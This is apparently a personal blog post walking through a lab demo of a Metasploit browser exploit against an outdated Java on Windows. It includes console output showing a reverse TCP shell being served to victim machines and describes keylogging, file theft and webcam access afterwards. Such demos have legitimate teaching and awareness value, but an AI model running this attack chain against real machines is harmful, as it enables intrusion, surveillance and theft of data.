Hacking with Metasploit

by Jon on January 27th, 2018
in Background

Always fun to play with Metasploit. For those who don''t know it was an open source project but is now run by the company Rapid7. There are supported versions but there is a free version called Framework edition. It doesn''t have a graphical interface, but I am a real man and like using command line anway.

The help page is great.

In brief:

  • Set up metasploit on a Linux box (if you are a real hacker and use Kali linux it is of course included).
  • Choose an "exploit" - I used one based on an old java version
  • Find a Windows box which has an old java
  • Point the browser in the Windows machine at the web site on your metasploit
  • The machine is hacked! From the metasploit machine you can run scripts, copy files, take screenshots, even use the microphone and camera.

It works even if the Windows machine is patched (except for the one vulnerability you are working on) is firewalled, and has antivirus. It is a great demo to show people just how vulnerable their PC is.

More info on this hack

This is a old one, but a good one and, as I said, is a great demo. All you need to do is make sure your Windows machine has the right version of Java and Oracle, conveniently, has an archive of old javas available online.

Fire up Metasploit.

Hacking with Metasploit
msf exploit(multi/browser/java_atomicreferencearray) > exploit
[*] Exploit running as background job 1.
msf exploit(multi/browser/java_atomicreferencearray) >
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Using URL: http://192.168.1.10:8080/index.htm
[*] Server started.
[*] 192.168.1.4 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.4 java_atomicreferencearray - Sending java reverse shell
[*] 192.168.1.4 java_atomicreferencearray - Generated jar to drop (5309 bytes).
[*] 192.168.1.2 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability

[*] 192.168.1.2 java_atomicreferencearray - Sending java reverse shell
[*] 192.168.1.2 java_atomicreferencearray - Generated jar to drop (5309 bytes).
[*] 192.168.1.2 java_atomicreferencearray - Sending jar\r\n

On the Windows PC go to http://192.168.1.10:8080/index.htm and then in Metasploit, we are on the Windows machine.
 
Even though the user is not an admin we can copy any of his files, watch everything he types (keylogger), take screenshots.
Hacking with Metasploit

1 comment

Anonymous Demo User
Hi! This is a sample comment that has been approved by default! Admins and moderators can very quickly approve or reject comments from the collection dashboard.
18/07/19 @ 10:00 pm

This post has 1 feedback awaiting moderation...


Form is loading...